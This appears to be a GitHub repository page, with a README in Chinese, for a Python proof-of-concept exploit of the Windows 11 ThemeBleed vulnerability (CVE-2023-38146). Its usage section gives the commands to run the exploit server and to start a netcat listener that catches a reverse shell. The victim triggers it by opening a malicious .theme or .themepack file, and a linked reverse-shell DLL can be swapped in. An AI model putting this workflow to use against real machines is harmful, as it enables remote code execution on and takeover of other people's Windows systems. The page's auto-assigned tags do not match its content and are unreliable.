CH0ico/CVE-2023-38146-Poc

GitHub: CH0ico/CVE-2023-38146-Poc

针对 Windows 11 ThemeBleed 漏洞(CVE-2023-38146)的跨平台 Python PoC 利用工具,通过恶意主题文件触发远程代码执行。

Stars: 0 | Forks: 0

# ThemeBleed CVE-2023-38146 漏洞利用 PoC (Windows 11 Themes) 深受 https://github.com/gabe-k/themebleed 的启发,该仓库只能在 Windows 上运行(这也是我决定编写此程序的原因)。 使用了来自 impacket smbserver.py 的修改代码 (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py) 有用的参考资料:https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs 博客文章: https://jnns.de/posts/cve-2023-38146-poc/ ## 如何使用: 安装依赖项并运行应用程序: ``` pip3 install -r requirements.txt python3 themebleed.py -r HOST -p 4711 # 在另一个 shell 中启动 nc listener rlwrap -cAr nc -lvnp 4711 ``` 在存在漏洞的机器上使用 "evil_theme.theme" 或 "evil_theme.themepack"。 大功告成! ## 自定义 DLL 文件: 将包含导出函数 "VerifyThemeVersion" 的 DLL 放在 "./td/" 文件夹中,并命名为 "Aero.msstyles_vrf_evil.dll"。你应该可以通过搜索引擎找到一个示例 DLL,或者使用我的示例 https://github.com/Jnnshschl/ThemeBleedReverseShellDLL。 ``` pip3 install -r requirements.txt python3 themebleed.py -r HOST --no-dll # 在另一个 shell 中启动 nc listener rlwrap -cAr nc -lvnp 4711 ```
标签:PoC, Python, SMB协议, XXE攻击, 无后门, 暴力破解, 逆向工具